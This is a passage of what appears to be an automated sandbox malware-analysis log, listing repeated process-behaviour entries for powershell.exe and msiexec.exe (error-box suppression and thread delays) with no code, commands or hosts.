              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599769Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599531Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599418Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599297Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599188Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599063Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598937Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598828Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598719Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598609Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598500Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598391Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598266Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598141Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598032Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597907Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597782Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597672Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597563Jump to behavior
